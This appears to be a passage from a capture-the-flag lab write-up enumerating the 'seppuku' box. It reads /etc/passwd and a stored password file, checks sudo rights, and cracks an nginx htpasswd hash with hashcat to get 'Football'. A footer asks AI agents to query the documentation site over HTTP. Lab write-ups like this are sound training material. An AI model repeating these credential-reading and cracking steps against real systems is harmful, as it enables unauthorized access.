# 7 box enum seppuku ``` # seppuku:eeyoree seppuku@seppuku:~$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash [truncated] www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin samurai:x:1001:1002:,,,:/home/samurai:/bin/rbash tanto:x:1002:1003:,,,:/home/tanto:/bin/rbas seppuku@seppuku:~$ cat .passwd 12345685213456!@!@A # works for samurai user seppuku@seppuku:~$ sudo -l Matching Defaults entries for seppuku on seppuku: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User seppuku may run the following commands on seppuku: (ALL) NOPASSWD: /usr/bin/ln -sf /root/ /tmp/ # this will basically create a symlink /tmp/root that points to /root/ seppuku@seppuku:/tmp$ ls -la /tmp/root lrwxrwxrwx 1 root root 6 Aug 27 01:40 /tmp/root -> /root/ # but we cant read anything due to perms seppuku@seppuku:/tmp$ ls -la /tmp/root/ ls: cannot open directory '/tmp/root/': Permission denied ``` ### PEAS ``` ╣ Analyzing Htpasswd Files (limit 70) -rw-r--r-- 1 root root 44 May 13 2020 /etc/nginx/.htpasswd admin:$apr1$sHVvV4Vi$FFQ2lYSWSsNM/gDRPXPgr1 $ hashcat -m 1600 hash /usr/share/wordlists/rockyou.txt --show $apr1$sHVvV4Vi$FFQ2lYSWSsNM/gDRPXPgr1:Football # admin:Football works on http://192.168.131.90/ # basic auth successful ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://kashz.gitbook.io/proving-grounds-writeups/pg-boxes/seppuku/7-box-enum-seppuku.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.